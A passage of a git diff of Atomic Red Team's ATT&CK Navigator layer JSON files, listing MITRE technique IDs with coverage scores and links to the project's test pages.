anaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryc
o/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueI
D":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID"
:"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md
"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002
/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155
6.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics
/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/at
omics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 106fd708..6795fd26 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1
036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,
"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T
1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","sco
